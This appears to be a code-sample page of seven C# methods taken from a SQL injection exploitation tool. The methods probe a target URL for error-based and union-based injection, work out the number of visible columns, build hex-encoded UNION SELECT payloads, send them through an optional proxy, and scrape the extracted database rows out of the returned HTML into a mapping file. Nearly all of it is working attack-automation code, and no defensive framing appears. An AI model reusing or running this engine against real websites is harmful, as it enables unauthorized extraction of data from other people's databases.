Exemplo n.º 1
0
        public string GetSingleCustomQueryResultRow(int startingFrom)
        {
            string result = string.Empty;

            string generatedPayload = PayloadDetails.Payload;

            if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
                }
            }

            if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
            {
                generatedPayload = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms),
                                                 generatedPayload, startingFrom);
            }

            string query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedPayload);
            string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);

            result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
            //@TODO: strip scripts
            if (!string.IsNullOrEmpty(MappingFile) && !string.IsNullOrEmpty(result))
            {
                XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, result, this,
                                             (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
            }

            return(result);
        }
Exemplo n.º 2
0
        public bool TestIfVulnerable()
        {
            string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, GeneralPayloads.ErrorBasedVictimIdentifier);

            string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            var    result   = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            return(!string.IsNullOrEmpty(result) && result == GeneralPayloads.ErrorBasedVictimConfirmationResult);
        }
Exemplo n.º 3
0
        public int GetTotalNoOfCustomQueryResultRows()
        {
            int    count            = 0;
            string generatedpayload = string.Empty;

            if (PayloadDetails == null)
            {
                return(0);
            }

            if (string.IsNullOrEmpty(PayloadDetails.Payload))
            {
                return(0);
            }

            if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
            {
                return(1);
            }

            generatedpayload = PayloadDetails.Payload;

            if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
                }
            }

            generatedpayload = /*UrlHelpers.HexEncodeValue(*/ string.Format(GeneralPayloads.QueryResultCount, generatedpayload);//);

            string query       = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedpayload);
            string pageHtml    = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            string countString = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            int.TryParse(countString, out count);

            return(count);
        }
Exemplo n.º 4
0
        public string GetIp(ref string error)
        {
            string result   = string.Empty;
            string pageHtml = string.Empty;

            if (_details != null)
            {//@TODO: baga asta intr-un thread
                try
                {
                    pageHtml = QueryRunner.GetPageHtml(_details.Url, UseProxy ? ProxyDetails : null);
                }
                catch (Exception ex)
                {
                    error = "Can not obtain IP, error from ip obtainer website or erroneous bounds defined in configuration file";
                }
                result = GetAnswerFromHtml(pageHtml, ref error);
            }
            else
            {
                error = "Can not obtain IP, missing or erroneous configuration(ipcheckers.xml)";
            }

            return(result);
        }
Exemplo n.º 5
0
        public string GetSingleCustomQueryResultRow(int startingFrom)
        {
            string        results  = string.Empty;
            StringBuilder sbResult = new StringBuilder();

            string generatedPayload = PayloadDetails.Payload;

            if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
                }
            }


            StringBuilder sbCurExploit = new StringBuilder();

            int    columnIndexCounter        = 0;
            string generatedPayloadWithLimit = string.Empty;

            for (int j = 0; j < _nrCols; j++)
            {
                if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
                {
                    generatedPayloadWithLimit = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms), generatedPayload, startingFrom + j);
                }

                if (_visibleColumnIndexes.Contains(j))
                {
                    /*
                     * sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapper, _visibleColumnIndexes[columnIndexCounter],
                     *  (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) ? generatedPayloadWithLimit : generatedPayload);
                     */

                    sbCurExploit.Append(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart1);
                    sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart2,
                                                                                _visibleColumnIndexes[columnIndexCounter])));
                    sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart3,
                                              (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) ? generatedPayloadWithLimit : generatedPayload);

                    columnIndexCounter++;
                }
                else
                {
                    sbCurExploit.AppendFormat(j.ToString());
                }

                if (j < _nrCols - 1)
                {
                    sbCurExploit.Append(",");
                }
            }


            string         query        = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
            string         pageHtml     = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            IList <string> resultsBatch = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            string      actualValue       = string.Empty;
            int         separatorIndex    = 0;
            int         columnIndex       = 0;
            string      columnIndexString = "";
            IList <int> columnsProcessed  = new List <int>();

            foreach (string singleResult in resultsBatch)
            {
                //@TODO: strip scripts
                separatorIndex = singleResult.IndexOf(GeneralPayloads.UnionBasedResultSeparator);
                if (separatorIndex != -1)
                {
                    columnIndexString = singleResult.Substring(0, separatorIndex);
                    if (!int.TryParse(columnIndexString, out columnIndex))
                    {
                        continue;
                    }

                    if (columnsProcessed.Contains(columnIndex))
                    {
                        continue;
                    }
                    else
                    {
                        columnsProcessed.Add(columnIndex);
                    }

                    actualValue = singleResult.Substring(separatorIndex + GeneralPayloads.UnionBasedResultSeparator.Length);

                    if (!string.IsNullOrEmpty(MappingFile))
                    {
                        XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, actualValue, this,
                                                     (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
                    }

                    sbResult.Append(actualValue);
                    sbResult.Append(Environment.NewLine);
                }

                if (columnsProcessed.Count == _visibleColumnIndexes.Count)
                {
                    break;
                }
            }
            return(sbResult.ToString());
        }
Exemplo n.º 6
0
        public int GetTotalNoOfCustomQueryResultRows()
        {
            if (_nrCols == 0 || _nrVisibleCols == 0 || _visibleColumnIndexes.Count() == 0)
            {
                if (!TestIfVulnerable())
                {
                    throw new SqlInjException("Given script is not injectable using current injection strategy");
                }
            }

            int    count            = 0;
            string generatedpayload = string.Empty;

            if (PayloadDetails == null)
            {
                return(0);
            }

            if (string.IsNullOrEmpty(PayloadDetails.Payload))
            {
                return(0);
            }

            if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
            {
                return(1);
            }

            generatedpayload = PayloadDetails.Payload;

            if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
            {
                foreach (var param in PayloadDetails.Params)
                {
                    generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
                }
            }

            generatedpayload = string.Format(GeneralPayloads.QueryResultCount, generatedpayload);

            StringBuilder sbCurExploit = new StringBuilder();

            sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectResultWrapper, generatedpayload);

            if (_nrCols > 1)
            {
                sbCurExploit.Append(",");
            }

            for (int j = 1; j < _nrCols; j++)
            {
                sbCurExploit.Append(j.ToString());
                if (j < _nrCols - 1)
                {
                    sbCurExploit.Append(",");
                }
            }

            string query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
            string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);

            var result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            int.TryParse(result, out count);
            return(count);
        }
Exemplo n.º 7
0
        public bool TestIfVulnerable()
        {
            bool result = false;

            StringBuilder sbCurExploit = new StringBuilder();
            string        query        = string.Empty;
            string        pageHtml     = string.Empty;

            if (string.IsNullOrEmpty(Url))
            {
                throw new Exception("No url provided so cannot test vulnerability");
            }

            for (int i = 0; i < _maxCols; i++)
            {
                if (i > 0)
                {
                    sbCurExploit.Append(",");
                }
                //sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectValue,i);
                sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectValue, i)));
                //ExploitDetails - check if null because it breaks
                query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
                pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
                if (pageHtml.Contains(GeneralPayloads.UnionBasedErrorMessage) && !pageHtml.Contains(GeneralPayloads.UnionBasedTestValue))
                {
                    continue;
                }
                else
                {
                    if (i > 0)
                    {
                        _nrCols = i + 1;

                        var stringResults = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
                        _visibleColumnIndexes = stringResults.Where(r => !string.IsNullOrEmpty(r)).Distinct().Select(r => int.Parse(r)).ToList();
                        _nrVisibleCols        = _visibleColumnIndexes.Count();

                        if (_nrVisibleCols > 0)
                        {
                            #region write to mapping file
                            if (!string.IsNullOrEmpty(MappingFile))
                            {
                                XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/originalquery", _nrCols.ToString(),
                                                                         this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
                                XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/resultinghtml",
                                                                         _nrVisibleCols.ToString(), this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
                                XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/indexes",
                                                                         ListHelpers.ListToCommaSeparatedValues(_visibleColumnIndexes),
                                                                         this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
                            }
                            #endregion write to mapping file

                            result = true;
                        }
                        else
                        {
                            result = false;
                            break;
                        }
                    }
                    else
                    {
                        result = false;
                    }

                    break;
                }
            }

            return(result);
        }